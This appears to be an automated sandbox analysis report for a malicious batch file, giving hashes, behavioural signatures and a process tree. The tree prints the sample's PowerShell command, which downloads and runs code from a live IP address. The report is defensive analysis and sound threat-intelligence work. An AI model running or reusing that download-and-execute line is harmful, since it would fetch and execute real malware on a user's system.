Analysis
max time kernel: 128s
max time network: 116s
platform: windows10_x64
resource: win10v200430
submitted: 04-06-2020 22:10
Static task: static1

Behavioral task: behavioral1
Sample: bef69b68e4cea8e3eefee8da26543509.bat
Resource: win7v200430 (windows7_x64)
0 signatures, 0 seconds

Behavioral task: behavioral2
Sample: bef69b68e4cea8e3eefee8da26543509.bat
Resource: win10v200430 (windows10_x64)
0 signatures, 0 seconds
General
Target: bef69b68e4cea8e3eefee8da26543509.bat
Size: 220B
MD5: f506edf0fe02fe851c4ad75db6112399
SHA1: 583ba0b7f8553e3ea3adf90de4f1750e8d989390
SHA256: f6d98f99d70c4be05421f3c7fddc98c074854a0e6a38659100f275804a5c187e
SHA512: db82f1056a21ebf451fb3bc400daf9efd94c43110f256c74653bc68f7c113a4d93e1c633c084a687cb42d391875c026fa643c221ccb1126ead3bf2d7cfaa3619
Score: 10/10
Malware Config
Extracted
Language: ps1
Source: ps1.dropper
URLs: http://185.103.242.78/pastes/bef69b68e4cea8e3eefee8da26543509
Signatures

Program crash (1 IoC)
Processes:
pid   pid_target   process        target process
2064  1812         WerFault.exe   powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
description                  pid    process
Token: SeRestorePrivilege    2064   WerFault.exe
Token: SeBackupPrivilege     2064   WerFault.exe
Token: SeDebugPrivilege      2064   WerFault.exe

Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes:
pid    process
2064   WerFault.exe (14 occurrences)
Processes (process tree, indented by depth)

C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\bef69b68e4cea8e3eefee8da26543509.bat"
  PID: 1504

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/bef69b68e4cea8e3eefee8da26543509');Invoke-YKHKXOBCRZILZ;Start-Sleep -s 10000"
    PID: 1812

    C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 704
      PID: 2064
      Signatures:
      - Program crash
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses